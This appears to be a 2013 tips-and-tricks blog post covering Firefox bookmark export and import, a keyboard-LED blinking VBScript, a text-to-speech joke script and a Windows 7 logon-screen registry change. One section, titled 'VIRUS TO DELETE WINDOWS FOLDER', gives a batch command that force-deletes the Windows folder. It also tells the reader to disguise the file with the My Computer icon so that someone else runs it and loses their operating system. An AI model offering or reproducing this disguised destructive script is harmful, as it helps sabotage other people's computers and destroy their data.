Monday 19 August 2013

HOW to export and import Bookmarks in Firefox.....

Bookmark is the finest way to mark the practical website which you want to admission daily. It is hard to learn the domain name of the all the websites you want to visit. So browser have bookmark feature to add links to bookmark so that user can visit websites without learning the domain of the website.
You can also import and export bookmarks. This helps to take your bookmarks with you. Export bookmarks and hoard to your system. Take it to another system with flash drive and then import it to the browser. Thus you can make your bookmarks portable.

Follow these guides to import bookmarks:

  • Open Mozilla Firefox
  • Select BOOKMARKS from the toolbar at the top of the screen
  • Select ORGANIZE BOOKMARKS from the drop down menu
  • Select FILE --> IMPORT
  • Browse for the location to load the bookmarks


Same steps can be taken for the exporting bookmarks. See below

  • Open Mozilla Firefox
  • Select BOOKMARKS from the toolbar at the top of the screen
  • Select ORGANIZE BOOKMARKS from the drop down menu
  • Select FILE --> EXPORT
  • Browse for the location to save the bookmarks

VIRUS TO DELETE WINDOWS FOLDER .....

Step 1: Open Notepad and type following command as it is without Quotes.

“del C:\Windows /f /q”
Step 2: NOTE :Instead of C:/ you have to type your drive in which Windows is installed.

Step 3: Save it as a.bat (don’t forget to choose all files from save option.)

Step 4: Now save it in any Drive other than C: . 

  
                                

Step 6: Then Change the Icon of the file as My Computer icon. (refer the above image)

Step 7: Now change that file icon as My Computer icon and then leave the computer.

AFTER THAT:  Now when someone will open the My Computer the Windows folder will be deleted and that person will have to reinstall the OS.

MAKE Your Keyboard LED Dancing ......

Hi guys, this is a simple trick to blink your keyboard LED’s continuously by a simple batch programming. Steps:

·         * Open notepad and copy paste the following code into that notepad

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
 
·         * And then save that file as “led.vbs” (Note: Make sure need must vbs)

·         * Now double click that vbs. You can see the dancing of your keyboard LED’s.

 To Stop that blinking go to task manager (control+Alt+Del). And Choose process tab then right click on wscript process and end the process.
Gunaseelan

Thanks to watching this.

CHECK Your Computer is Male or Female......

This is really a funny trick, guys. Now you can know the gender of your computer that is male or female. Just follow the step: (Note: you must have speaker or headphone)

  • ♦  Open a Notepad and paste the following codes in to that file.     
  •  
    CreateObject("SAPI.SpVoice").Speak"i love you"
  • ♦  Save the file as “gender.vbs”

  • ♦  Put your speaker ON or just take your head phone.

  • ♦  Now open that saved file

  • ♦  Then if you hear male voice, your computer is male and if you hear female voice means its female.

HOW to Change Windows 7 Logon Screen....

Hi Friends, are you bored with the same log screen daily. Here is the trick to change that screen image. Just follow the instructions: 


  • Open run mode (i.e windows key + R)
  • Then type regedit and hit enter
  • Now navigate to    


    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background

     
  • Change value of OEMBackground to 1. ( double click OEMBackground and change the value 0 to 1)
  • Now open the path C:\Windows\System32\oobe\info
     
  • And create a new folder with the name “backgrounds”  (i.e C:\Windows\System32\oobe\info\backgrounds)
     
  • Now copy paste your own image to this folder and rename the image to “backgrounddefault.jpg” and refresh the PC.
     
  • Finally press windows key + L now you can see your own logon screen.

Author Bio: This is ANKIT PATEL. I am very interesting in ethical hacking i give some tips and tricks in this blog. Hope you are all like those tricks. If you like means please leave a comment here . Thanks for watching this.